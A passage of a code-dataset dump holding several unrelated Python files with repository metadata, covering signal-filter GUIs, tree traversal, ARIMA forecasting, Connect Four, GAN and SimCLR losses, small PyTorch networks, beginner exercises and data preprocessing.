'请先加载原数据')\r\n\r\n #进行滤波\r\n def getFlt(self,flag):\r\n if self.ok == 2:\r\n if flag == 1:\r\n self.flt_data = LMS_AdaFilter(self.noise, self.noise_data,int(self.N.get()),float(self.mu.get()))\r\n self.show(3)\r\n elif flag == 2:\r\n self.flt_data = NLMS_AdaFilter(self.noise, self.noise_data,int(self.N.get()),float(self.mu.get()))\r\n self.show(3)\r\n elif flag == 3:\r\n self.flt_data = RLS_AdaFilter(self.noise, self.noise_data,int(self.N.get()))\r\n self.show(3)\r\n else:\r\n messagebox.showinfo('错误!', '请选择一个算法')\r\n elif self.ok == 0:\r\n messagebox.showinfo('错误!', '请先加载原数据')\r\n else:\r\n messagebox.showinfo('错误!', '请先加载噪声数据')\r\n\r\n # 显示信号\r\n def show(self,flag):\r\n if flag == 1:\r\n\r\n global orgPic\r\n plt.figure()\r\n plt.plot(self.org[-self.showLen:])\r\n plt.axis('off')\r\n plt.savefig(\"org.png\", bbox_inches='tight')\r\n img1 = Image.open('org.png')\r\n img1 = img1.resize((800, 220))\r\n orgPic = ImageTk.PhotoImage(img1)\r\n if not self.f1:\r\n self.f1 = Label(self.org_show, image=orgPic)\r\n self.f1.pack()\r\n else:\r\n self.f1.configure(image=orgPic)\r\n self.f1.image = orgPic\r\n elif flag == 2:\r\n global noisePic\r\n plt.figure()\r\n plt.plot(self.noise_data[-self.showLen:])\r\n plt.axis('off')\r\n plt.savefig(\"noise.png\", bbox_inches='tight')\r\n img2 = Image.open('noise.png')\r\n img2 = img2.resize((800, 220))\r\n noisePic = ImageTk.PhotoImage(img2)\r\n if not self.f2:\r\n self.f2 = Label(self.nos_show, image=noisePic)\r\n self.f2.pack()\r\n else:\r\n self.f2.configure(image=noisePic)\r\n self.f2.image = noisePic\r\n elif flag == 3:\r\n global fltPic\r\n plt.figure()\r\n plt.plot(self.flt_data[-self.showLen:])\r\n plt.axis('off')\r\n plt.savefig(\"flt.png\", bbox_inches='tight')\r\n img3 = Image.open('flt.png')\r\n img3 = img3.resize((800, 220))\r\n fltPic = ImageTk.PhotoImage(img3)\r\n if not self.f3:\r\n self.f3 = Label(self.flt_show, image=fltPic)\r\n self.f3.pack()\r\n else:\r\n self.f3.configure(image=fltPic)\r\n self.f3.image = fltPic\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n root = Tk()\r\n AdapFilterGUI(root)\r\n except:\r\n messagebox.showinfo('错误!', '请重新操作')","repo_name":"kafchen/ECGprocessing","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":13286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"10737230026","text":"# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param A : root node of tree\n # @return a list of integers\n def preorderTraversal(self, A):\n if not A:\n return list()\n output, stack = list(), list()\n stack.append(A)\n while stack:\n popped = stack.pop()\n output.append(popped.val)\n if popped.right:\n stack.append(popped.right)\n if popped.left:\n stack.append(popped.left)\n return output\n","repo_name":"purushothamc/myibitsolutions","sub_path":"trees/iterative_pre_order.py","file_name":"iterative_pre_order.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"120478001","text":"import pandas as pd\nfrom matplotlib import pyplot\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\n \n\nseries =pd.read_csv(\"C:\\\\Users\\\\mohamed ismail\\\\Desktop\\\\GP And Data\\\\Telecom Egypt.csv\")\nX = series.iloc[:,-1].values\n\nsize = int(len(X) * 0.66)\ntrain, test = X[0:size], X[size:len(X)]\n\nhistory = [x for x in train]\npredictions = list()\n\nfor t in range(len(test)):#\n\tmodel = ARIMA(history, order=(6,1,0))\n\tmodel_fit = model.fit(disp=0)\n\toutput = model_fit.forecast()\n\tyhat = output[0]\n\tpredictions.append(yhat)\n\tobs = test[t]\n\thistory.append(obs)\n\tprint('predicted=%f, expected=%f' % (yhat, obs))\n \nerror = mean_squared_error(test, predictions)\nprint('Test MSE: %.3f' % error)\n# plot\npyplot.plot(test,color='blue',label=\"actual\")\npyplot.plot(predictions, color='red',label=\"prediction\")\npyplot.legend()\npyplot.show()","repo_name":"MohamedAhmedIsmail/Algo-Trading-Models-Machine-Learning","sub_path":"Models/ARIMA_MODEL.py","file_name":"ARIMA_MODEL.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"40947207868","text":"import connectfour\n\nCOLOR = {connectfour.RED:'Red', connectfour.YELLOW:'Yellow'}\n\ndef print_board(gamestate) -> None:\n ui = ' 1 2 3 4 5 6 7\\n'\n\n for column in range(connectfour.BOARD_ROWS):\n for row in range(connectfour.BOARD_COLUMNS): \n if gamestate.board[row][column] == 1:\n ui += ' R '\n elif gamestate.board[row][column] == 2:\n ui += ' Y '\n elif gamestate.board[row][column] == 0:\n ui += ' . '\n\n if row == connectfour.BOARD_ROWS:\n ui += '\\n' \n \n print(ui)\n\n\ndef user_input(game_state) -> str:\n while True:\n input_pop_or_drop = input(f\" {COLOR[game_state.turn]} Pop or Drop (SPACE) Column(1-7) Ex. POP(SPACE)3: \")\n uppercase = input_pop_or_drop.upper()\n uppercase_spliter = uppercase.split()\n if uppercase_spliter[0] != 'DROP' and uppercase_spliter[0] !='POP':\n continue\n\n return uppercase\n\n\ndef drop_or_pop_action(game_state, user_input) -> 'game_state':\n\n player_input_spliter = user_input.split()\n player_option = player_input_spliter[0].upper()\n player_column = int(player_input_spliter[1])-1\n\n if player_option == 'DROP':\n game_state = connectfour.drop(game_state, player_column)\n return game_state\n elif player_option == 'POP':\n game_state = connectfour.pop(game_state, player_column)\n return game_state\n\n\ndef who_won(game_state) -> None:\n if connectfour.winner(game_state) == connectfour.RED:\n print(\"Red is the winner\")\n elif connectfour.winner(game_state) == connectfour.YELLOW:\n print(\"Yellow is the winner\")","repo_name":"smallxdoggo/connectfour_project2","sub_path":"shared_functions.py","file_name":"shared_functions.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"73932694182","text":"import torch\n\ndef get_adversarial_loss(inputs, positive=True):\n def hinge_loss(X, positive=True):\n if positive:\n return torch.relu(1 - X).mean()\n else:\n return torch.relu(X + 1).mean()\n\n loss = 0\n for scores_map in inputs:\n loss += hinge_loss(scores_map, positive)\n return loss\n\ndef get_attribute_loss(z_att_x, z_att_y, batch_size=1):\n L_attr = 0\n\n for i in range(len(z_att_x)):\n L_attr += torch.mean(torch.pow(z_att_x[i] - z_att_y[i], 2).reshape(batch_size, -1), dim=1).mean()\n\n L_attr /= 2.0\n\n return L_attr\n\ndef get_identity_loss(z_id, z_Y_id):\n return (1 - torch.cosine_similarity(z_id, z_Y_id, dim=1)).mean()\n\ndef get_reconstruction_loss(Y, X_t, same_person, batch_size=1):\n return torch.sum(0.5 * torch.mean(torch.pow(Y - X_t, 2)\\\n .reshape(batch_size, -1), dim=1) * same_person)\\\n / (same_person.sum() + 1e-6)\n\n\ndef get_generator_loss(fake_discr_scores, Z_att, Z_Y_att,\n Z_id, Z_Y_id, Y, X_t, same):\n\n\n adversarial_loss_g = get_adversarial_loss(fake_discr_scores, positive=True)\n\n attribute_loss = get_attribute_loss(Z_att, Z_Y_att)\n\n identity_loss = get_identity_loss(Z_id, Z_Y_id)\n\n reconstruction_loss = get_reconstruction_loss(Y, X_t, same)\n\n loss_g = 1 * adversarial_loss_g + 10 * attribute_loss +\\\n 5 * identity_loss + 10 * reconstruction_loss\n\n losses = {\"adversarial_loss_g\": adversarial_loss_g,\n \"attribute_loss\": attribute_loss,\n \"identity_loss\": identity_loss,\n \"reconstruction_loss\": reconstruction_loss,\n \"loss_g\": loss_g}\n\n return loss_g, losses\n\ndef get_discriminator_loss(fake_discr_scores, true_discr_scores):\n adversarial_loss_d_fake = get_adversarial_loss(fake_discr_scores,\n positive=False)\n adversarial_loss_d_true = get_adversarial_loss(true_discr_scores,\n positive=True)\n loss_d = 0.5 * (adversarial_loss_d_fake + adversarial_loss_d_true)\n\n losses = {\"adv_loss_d_fake\": adversarial_loss_d_fake,\n \"adv_loss_d_true\": adversarial_loss_d_true,\n \"loss_d\": loss_d}\n\n return loss_d, losses\n","repo_name":"Olksndr/FaceShifter","sub_path":"model/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"30996456611","text":"\nimport os, sys\nfrom distutils.core import setup\nfrom os.path import join\n\n_rpmVersion='__version__'\n_name='__packagename__'\n_author='__author__'\n_author_email=''\n_description='__description__'\n_url='__url__'\n_module='__module__'\n\n\nsetup(name=_name,\n version = _rpmVersion,\n description = _description,\n author = _author,\n author_email = _author_email,\n url = _url,\n\n packages = [_module],\n package_dir = {'' : ''},\n package_data = {_module : ['*.so']}\n\n )\n\n","repo_name":"kreczko/swatch","sub_path":"config/setupTemplate.py","file_name":"setupTemplate.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"25050160508","text":"import torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\ntorch.manual_seed(2)\n\n\nclass two_layer_flat(nn.Module):\n\tdef __init__(self, input_dim=2, hid_dim=2, output_dim=1):\n\t\tsuper(two_layer_flat, self).__init__()\n\t\tself.lin1 = nn.Linear(input_dim, hid_dim)\n\t\tself.lin2 = nn.Linear(hid_dim, output_dim)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Linear):\n\t\t\t\tm.weight.data.fill_(1)\n\t\t\t\tm.bias.data.fill_(0)\n\n\tdef forward(self, x):\n\t\tx = self.lin1(x)\n\t\tx = self.lin2(x)\n\t\treturn x\n\n\nclass two_layer_sigmoid(nn.Module):\n\tdef __init__(self, input_dim=2, hid_dim=2, output_dim=1):\n\t\tsuper(two_layer_sigmoid, self).__init__()\n\t\tself.lin1 = nn.Linear(input_dim, hid_dim)\n\t\tself.lin2 = nn.Linear(hid_dim, output_dim)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Linear):\n\t\t\t\tm.weight.data.normal_(0,1)\n\n\tdef forward(self, x):\n\t\tx = torch.Tensor(x)\n\t\tx = self.lin1(x)\n\t\tx = torch.sigmoid(x)\n\t\tx = self.lin2(x)\n\t\tx = torch.sigmoid(x)\n\t\treturn x\n\n\nclass two_layer_relu(nn.Module):\n\tdef __init__(self, input_dim=2, hid_dim=2, output_dim=1):\n\t\tsuper(two_layer_relu, self).__init__()\n\t\tself.lin1 = nn.Linear(input_dim, hid_dim)\n\t\tself.lin2 = nn.Linear(hid_dim, output_dim)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Linear):\n\t\t\t\tm.weight.data.normal_(0,1)\n\n\tdef forward(self, x):\n\t\tx = self.lin1(x)\n\t\tx = torch.relu(x)\n\t\tx = self.lin2(x)\n\t\tx = torch.relu(x)\n\t\treturn x\n\n\nclass three_layer_sigmoid(nn.Module):\n\tdef __init__(self, input_dim=2, hid_dim_1=2, hid_dim_2=2, output_dim=1):\n\t\tsuper(three_layer_sigmoid, self).__init__()\n\t\tself.lin1 = nn.Linear(input_dim, hid_dim_1)\n\t\tself.lin2 = nn.Linear(hid_dim_1, hid_dim_2)\n\t\tself.lin3 = nn.Linear(hid_dim_2, output_dim)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Linear):\n\t\t\t\tm.weight.data.normal_(0,1)\n\n\tdef forward(self, x):\n\t\tx = self.lin1(x)\n\t\tx = torch.sigmoid(x)\n\t\tx = self.lin2(x)\n\t\tx = torch.sigmoid(x)\n\t\tx = self.lin3(x)\n\t\tx = torch.sigmoid(x)\n\t\treturn x\n\n\nclass three_layer_relu(nn.Module):\n\tdef __init__(self, input_dim=2, hid_dim_1=2, hid_dim_2=2, output_dim=1):\n\t\tsuper(three_layer_relu, self).__init__()\n\t\tself.lin1 = nn.Linear(input_dim, hid_dim_1)\n\t\tself.lin2 = nn.Linear(hid_dim_1, hid_dim_2)\n\t\tself.lin3 = nn.Linear(hid_dim_2, output_dim)\n\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.Linear):\n\t\t\t\tm.weight.data.normal_(0,1)\n\n\tdef forward(self, x):\n\t\tx = self.lin1(x)\n\t\tx = torch.relu(x)\n\t\tx = self.lin2(x)\n\t\tx = torch.relu(x)\n\t\tx = self.lin3(x)\n\t\tx = torch.relu(x)\n\t\treturn x\t\n\ndef train(model, x, y, epochs=5, lr=1, momentum=0.9):\n\tX = torch.Tensor(x)\n\tY = torch.Tensor(y).type(torch.LongTensor)\n\tloss_func = nn.CrossEntropyLoss()\n\toptimizer = optim.SGD(model.parameters(), lr=lr, momentum=momentum)\n\tsteps = X.size(0)\n\tfor i in range(epochs):\n\t\tfor j in range(steps):\n\t\t\tdata_point = np.random.randint(X.size(0))\n\t\t\tx_var = Variable(X, requires_grad=False)\n\t\t\ty_var = Variable(Y, requires_grad=False)\n\n\t\t\toptimizer.zero_grad()\n\t\t\ty_hat = model(x_var)\n\n\t\t\tloss = loss_func(y_hat, y_var)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\t\n\t\tprint(\"Epoch: {0}, Loss: {1}, \".format(i, loss.data.numpy()))\n\n\ndef test(model, X, Y):\n\tcorrect = 0\n\tfor index in range(len(X)):\n\t\ty = model(X[index])\n\t\tresult = [0 if not i == max(y) else 1 for i in y]\n\t\tif result.index(1) == Y[index]:\n\t\t\tcorrect += 1\n\n\tprint(\"corrected {0}/{1}, a ratio of {2}.\".format(correct, len(X), correct/len(X)))\n\n\n# A = torch.Tensor([1,2,3])\n# print(F.softmax(A, dim=0))\n\n","repo_name":"Emericen/5522Lab-4","sub_path":"component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"41732539828","text":"import math\n\nfrom sympy import isprime\n\n\ndef printGreeting():\n print(\"Hello World!\")\n\n\ndef printZ():\n print(\"*****\")\n print(\" *\")\n print(\" *\")\n print(\" *\")\n print(\"*****\")\n\n# Grading System--------------------------------------\n\n\ndef gradingSystem(marks):\n if (marks > 90):\n print(\"excellent\")\n elif (marks > 80):\n print(\"print good\")\n elif (marks > 70):\n print(\"fair\")\n elif (marks > 60):\n print(\"meets expectations\")\n else:\n print(\"below par\")\n\n\ndef gradingSystem():\n marks = input()\n gradingSystem(int(marks))\n\n# Odd-Even--------------------------------------------\n\n\ndef isEven(num):\n if (num % 2 == 0):\n return True\n else:\n return False\n\n\ndef ifOdd(num):\n return (True if(num % 2 != 0) else False)\n\n# calc-----------------------------------------------------\n\n\ndef calculator_(num1, num2, operator):\n if (operator == '+'):\n return num1 + num2\n elif (operator == '-'):\n return num1 - num2\n elif (operator == '*'):\n return num1 * num2\n else:\n return \"Invalid Input\"\n\n\ndef calculator():\n num1 = int(input())\n num2 = int(input())\n operator = input()\n\n print(calculator_(num1, num2, operator[0]))\n\n\n# prime Number----------------------------------------------\n\ndef isPrimeNumber(num):\n i = 2\n while i * i <= num:\n if(num % i == 0):\n return False\n i += 1\n\n return True\n\n\ndef printAllPrimeNumbers():\n x = int(input())\n y = int(input())\n\n for num in range(x, y + 1):\n if(isPrimeNumber(num)):\n print(num)\n\n\n# Leetcode 509------------------------------------------------\n\ndef printFibo(n):\n a = 0\n b = 1\n for i in range(n):\n # print(a)\n sum = a + b\n a = b\n b = sum\n\n return a\n\n# Bulb_problem-------------------------------------------------\n\ndef bulbToggle(num):\n i = 1\n while i * i <= num:\n print(i)\n\n","repo_name":"rajneeshkumar146/AlmaBetter","sub_path":"lecture_001/T001_basics.py","file_name":"T001_basics.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"15973968790","text":"from tkinter import *\n\nclass MyFirstGUI:\n def __init__(self, master):\n self.master = master\n master.grid()\n self.label = Label(master, text=\"This is our first GUI!\")\n self.label.grid()\n\n self.greet_button = Button(master, text=\"Greet\", command=self.greet)\n self.greet_button.grid()\n self.count=0\n self.close_button = Button(master, text=\"Close\", command=self.master.destroy)\n self.close_button.grid()\n\n def greet(self):\n #print(\"Greetings!\")\n self.count+=1\n self.greet_button[\"text\"]=\"Clicked:\",self.count,\" times\"\n\nroot = Tk()\nfra1=Frame(root)\nroot.title(\"A simple GUI\")\nroot.geometry(\"400x400\")\nmy_gui = MyFirstGUI(fra1)\nroot.mainloop()\n","repo_name":"obedjunias/1BM17CS055-PIP","sub_path":"Misc/MATERIALS/PIP Programs/tkinter/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"34089889295","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\n\r\n\r\nclass SimCLR_Loss(nn.Module):\r\n def __init__(self, batch_size, temperature):\r\n super().__init__()\r\n self.batch_size = batch_size\r\n self.temperature = temperature\r\n\r\n self.mask = self.mask_correlated_samples(batch_size)\r\n self.criterion = nn.CrossEntropyLoss(reduction=\"sum\")\r\n self.similarity_f = nn.CosineSimilarity(dim=2)\r\n\r\n def mask_correlated_samples(self, batch_size):\r\n N = 2 * batch_size\r\n mask = torch.ones((N, N), dtype=bool)\r\n mask = mask.fill_diagonal_(0)\r\n \r\n for i in range(batch_size):\r\n mask[i, batch_size + i] = 0\r\n mask[batch_size + i, i] = 0\r\n return mask\r\n\r\n def forward(self, z_i, z_j):\r\n\r\n N = 2 * self.batch_size\r\n\r\n z = torch.cat((z_i, z_j), dim=0)\r\n #print(z)\r\n #print(z.unsqueeze(1).size()) #200x1x512\r\n #print(z.unsqueeze(0).size()) #1x200x512\r\n\r\n sim = self.similarity_f(z.unsqueeze(1), z.unsqueeze(0)) #/ self.temperature #200x200\r\n\r\n sim_i_j = torch.diag(sim, self.batch_size)\r\n sim_j_i = torch.diag(sim, -self.batch_size)\r\n \r\n # We have 2N samples, but with Distributed training every GPU gets N examples too, resulting in: 2xNxN\r\n positive_samples = torch.cat((sim_i_j, sim_j_i), dim=0).reshape(N, 1) #200x1\r\n \r\n arrPos = []\r\n arrNeg = []\r\n for i in range(100):\r\n pos = positive_samples[i][0].tolist()\r\n arrPos.append(pos) \r\n \r\n print(arrPos)\r\n \r\n negative_samples = sim[self.mask].reshape(N, -1) #200x198\r\n minNegSamples = torch.max(negative_samples, 1)\r\n minNegSamples = minNegSamples[0]\r\n \r\n for i in range(100):\r\n neg = max(minNegSamples[i], minNegSamples[i+100]).tolist() \r\n arrNeg.append(neg) \r\n print(arrNeg) \r\n \r\n #SIMCLR\r\n labels = torch.from_numpy(np.array([0]*N)).reshape(-1).to(positive_samples.device).long() #.float()\r\n \r\n logits = torch.cat((positive_samples, negative_samples), dim=1)\r\n loss = self.criterion(logits, labels)\r\n loss /= N\r\n \r\n return arrPos, arrNeg","repo_name":"subhobose/contssl1","sub_path":"SIMCLR.py","file_name":"SIMCLR.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"14713192690","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport pylab as pl\nimport itertools \nfrom statsmodels.iolib.smpickle import load_pickle\nfrom sklearn.metrics import accuracy_score\nfrom sklearn import linear_model, decomposition, datasets \nimport numpy as np\nimport random \nimport json\n \n\n\nCRITERIA = {\"DebtRatio\":[(\"less than 50%\",0,.5),(\"less than 100%\",5,1),(\"less than 5 times\",1,5),(\"less than 10 times\",5,10),(\"more than 10 times\",10,float(\"inf\"))]}\nY_VARIABLE = 'SeriousDlqin2yrs'\n\ndef read_csv(filename):\n\t'''\n\tRead a csv and return a datafile \n\t'''\n\tdata_file = pd.read_csv(filename)\n\n\treturn data_file\n\n\ndef obtain_basic_statistics(data_file):\n\t'''\n\tProvide descriptive statistics and save them in\n\ta csv\n\t'''\n\tstats = data_file.describe().round(2)\n\tmissing_data = data_file.iloc[0,:].apply(lambda x : len(data_file) - x)\n\tmissing_data.name = \"missing values\"\n\tstats = stats.append(missing_data)\n\tstats.to_csv(\"descriptive_statistics.csv\")\n\n\ndef generate_histogram(data_file):\n\t'''\n\tGenerate histogram graphs and save them in png files\n\t'''\n\tfor variable in data_file.describe().keys():\n\t\thistograms = data_file[variable].hist(figsize=(15, 10))\n\t\tplt.savefig(variable+\"_histogram.png\", bbox_inches = \"tight\")\n\t\tplt.close()\n\ndef generate_correlations(data_file):\n\tcorrelations = data_file.corr()\n\tcorrelations.to_csv(\"correlations.csv\")\n\n\tfor x in data_file.describe().keys():\n\t\tfor y in [i for i in data_file.describe().keys() if i != x]:\n\t\t\tplt.scatter(data_file[x],data_file[y])\n\t\t\tplt.xlabel(x)\n\t\t\tplt.ylabel(y)\n\t\t\tplt.savefig(x+\"-\"+y+\"_histogram.png\", bbox_inches = \"tight\")\n\t\t\tplt.close()\n\n\ndef preprocess_data(data_file, method, list_grouping = []):\n\t'''\n\tFill in missing values \n\t'''\n\tif method == \"A\":\n\t\tdata_file = data_file.fillna(data_file.mean())\n\n\tif method == \"B\":\n\t\tl2 = itertools.combinations(list_grouping,2)\n\t\tlist_grouping += l2 \n\t\tfor variable in list_grouping:\n\t\t\tdata_file.fillna(datafile.groupby(variable).transform(\"mean\"), inplace = True)\n\n\tdata_file.to_csv(\"clean_database.csv\")\n\treturn data_file\n\n\ndef generate_discrete_variable(data, criteria_dict):\n\t'''\n\tWrite a sample function that can discretize a continuous variable \n\t'''\n\t#Generate categorical values from continous variable \n\tfor column, criteria in criteria_dict.items():\n\t\t#The parameter list contains the labels\n\t\tparameter_list = []\n\t\t#The range set contains the values for the different parameters\n\t\trange_set = set()\n\t\tfor parameter in range(len(criteria)):\n\t\t\tparameter_list.append(criteria[parameter][0])\n\t\t\trange_set.add(criteria[parameter][1])\n\t\t\trange_set.add(criteria[parameter][2])\n\n\t\trange_list = list(range_set)\n\t\trange_list.sort()\n\n\t\t#Generate categorical variables, the \"right\" option\n\t\t#creates set [a,b) to satisfy greater or equal restriction\n\t\t#for lower limit. \n\t\tdata[column] = pd.cut(data[column],range_list,\n\t\t\t\t\t\tright = False, labels = parameter_list)\n\t\t\n\t\t#Drop rows that did not have a categorical match\n\t\tdata = data[~data[column].isnull()]\n\n\treturn data \n\ndef generate_continous_variable(data, variable_list):\n\t'''\n\tfunction that can take a categorical variable and create \n\tbinary variables from it\n\t'''\n\tfor variable in variable_list:\n\t\tlist_values = list(data.groupby(variable).groups.keys())\n\t\tfor i,value in enumerate(list_values):\n\t\t\tdata[variable].replace(value,i)\n\n\treturn data \n\n\ndef build_logistic_classifier(data, y_variable, x_variables, model_numbers):\n\t'''\n\tWrite a sample function that can discretize a continuous variable \n\tand one function that can take a categorical variable and create \n\tbinary variables from it.\n\t'''\n\tmodel_list = []\n\tfor i in range(len(x_variables)):\n\t\tif i < len(x_variables) - 1:\n\t\t\trun_list = list(itertools.combinations(x_variables,i+2))\n\t\t\tmodel_list += run_list\n\t\n\tmodel_list = random.sample(model_list,model_numbers)\n\tmodel_list = [list(x) for x in model_list]\n\n\tgeneral_results = np.array([str(y_variable)])\n\tgeneral_results = np.append(general_results,data[y_variable])\n\tgeneral_results = general_results.reshape((-1,1))\n\tfor i, model_variable in enumerate(model_list):\n\t\tprint(i,model_variable)\n\t\tlogit = sm.Logit(data[y_variable], data[model_variable])\n\t\tresult = logit.fit()\n\t\tresult.save(str(i)+\"_results.pickle\")\n\t\theader = np.array([str(model_variable)])\n\t\tmodel_result = np.append(header, result.predict())\n\t\tmodel_result = model_result.reshape((-1,1))\n\t\tgeneral_results = np.append(general_results,model_result, axis = 1)\n\n\t\n\tnp.savetxt(\"predictions.csv\", general_results, fmt = \"%s\", delimiter=\"|\")\n\n\ndef evaluate_classifier(predictions_file):\n\tpredictions = pd.read_csv(predictions_file, delimiter = \"|\" )\n\taccuracy_dict = {}\n\tfor variable in predictions.columns:\n\t\tscore = accuracy_score(predictions.iloc[:,0],predictions[variable])\n\t\taccuracy_dict[variable] = score\n\n\tjson.dumps(accuracy_dict)\n\treturn accuracy_dict\n\n\n\n","repo_name":"cgrandet/machine_learning-cgrandet","sub_path":"PA2/ML_H2.py","file_name":"ML_H2.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"73605944105","text":"class Solution(object):\n def smallerNumbersThanCurrent(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n sort_num = sorted(nums)\n hashmap = {}\n for i in range(len(sort_num)):\n if sort_num[i] not in hashmap:\n hashmap[sort_num[i]] = i\n result = []\n for n in nums:\n result.append(hashmap[n])\n return result","repo_name":"yichenfromhyrule/LeetCode","sub_path":"#1365_HowManyNumbersAreSmallerThanTheCurrentNumber.py","file_name":"#1365_HowManyNumbersAreSmallerThanTheCurrentNumber.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"37405852297","text":"from azure.storage.blob import BlockBlobService, PublicAccess\n\n# Initializes Blob Storage Service\ndef InitializeBlobService(config):\n service = BlockBlobService(account_name=config['ACCOUNTNAME'], account_key=config['KEY'])\n return service\n\n# Uploads file to Blob Storage\ndef uploadFile(config,service,filename,f):\n try:\n service.create_blob_from_path(config['CONTAINER'], filename, f)\n print(\"File uploaded to blob storage.\")\n except Exception as e:\n print(e)\n\n# Gets file from Blob Storage and stores it locally\ndef getFile(config,service,filename,path):\n try:\n service.get_blob_to_path(config['CONTAINER'], filename, path)\n print(\"File retrieved from blob storage.\")\n except Exception as e:\n print(e)\n","repo_name":"Kagigz/python-doc-extraction","sub_path":"FunctionApp/FunctionProject/shared_code/storageHelper.py","file_name":"storageHelper.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"11404323056","text":"import sys\n\nvalid=0\nfor line in open(sys.argv[1]):\n\tcontent=line.strip().split()\n\tminimum=int(content[0].split(\"-\")[0])\n\tmaximum=int(content[0].split(\"-\")[1])\n\tletter=content[1].split(\":\")[0]\n\tseq=content[-1]\n\tif seq[minimum-1] == letter and not seq[maximum-1] == letter:\n\t\tvalid+=1\n\tif not seq[minimum-1] == letter and seq[maximum-1] == letter:\n\t\tvalid+=1\n\t\n\nprint(valid)\n","repo_name":"J35P312/AoC2020","sub_path":"Jesper/d2/d2_2.py","file_name":"d2_2.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"19817268540","text":"import numpy as np\nimport csv\nfrom pandas import read_csv\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nwith open('cancer-data.csv') as f:\n raw_data = f.read()\n\n####PREPROCESS OF THE DATASET######\ndef data_preprocess(raw_data):\n # Read string files\n dataset = list()\n csv_reader = csv.reader(raw_data.split('\\n'), delimiter=',')\n for row in csv_reader:\n if not row:\n continue\n dataset.append(row)\n pd_data = pd.DataFrame(dataset)\n\n labels = pd_data.iloc[:,-1].values\n labels = labels[:, np.newaxis]\n #CONVERTING TEXT CLASS LABELS TO NUMBERS\n b, c = np.unique(labels, return_inverse=True)\n labels = c[:, np.newaxis] + 1\n labels = pd.DataFrame(labels)\n #delete last column from dataframe\n pd_data.drop(pd_data.columns[len(pd_data.columns)-1], axis=1, inplace=True)\n #concatenate data with numerical class labels\n result = pd.concat([pd_data, labels], axis=1)\n \n\n #replace question marks with NaN\n result = result.replace(['?', '-'], np.nan)\n # drop rows with missing values\n result = result.dropna()\n\n dataset = result.values\n dataset = np.array(dataset).astype(np.float)\n\n # Find the min and max values for each column\n stats = [[min(column), max(column)] for column in zip(*dataset)]\n\n # Rescale dataset columns to the range 0-1 - normalization\n for row in dataset:\n for i in range(len(row)-1):\n row[i] = (row[i] - stats[i][0]) / (stats[i][1] - stats[i][0])\n return dataset\n\n\n#def data_preprocess2(filename):\n#\t# Load a CSV file\n#\tdataset = read_csv(filename, header=None)\n#\t# mark zero values as missing or NaN\n#\tdataset[[1,2,3,4,5,6,7,8,9]] = dataset[[1,2,3,4,5,6,7,8,9]].replace('?', np.NaN)\n#\t# drop rows with missing values\n#\tdataset.dropna(inplace=True)\n#\tdataset = np.array(dataset).astype(float)\n#\tdataset = np.delete(dataset, 0, axis=1)\n#\tprint (dataset.shape)\n#\n#\t# Find the min and max values for each column\n#\tstats = [[min(column), max(column)] for column in zip(*dataset)]\n#\n#\t# Rescale dataset columns to the range 0-1 - normalization\n#\tfor row in dataset:\n#\t\tfor i in range(len(row)-1):\n#\t\t\trow[i] = (row[i] - stats[i][0]) / (stats[i][1] - stats[i][0])\n#\n#\tfor i, data in enumerate(dataset):\n#\t\tif data[-1] == 2:\n#\t\t\tdata[-1] = 0\n#\t\tif data[-1] == 4:\n#\t\t\tdata[-1] = 1\n#\n#\tdataset = dataset[np.argsort(dataset[:, -1])]\n#\treturn 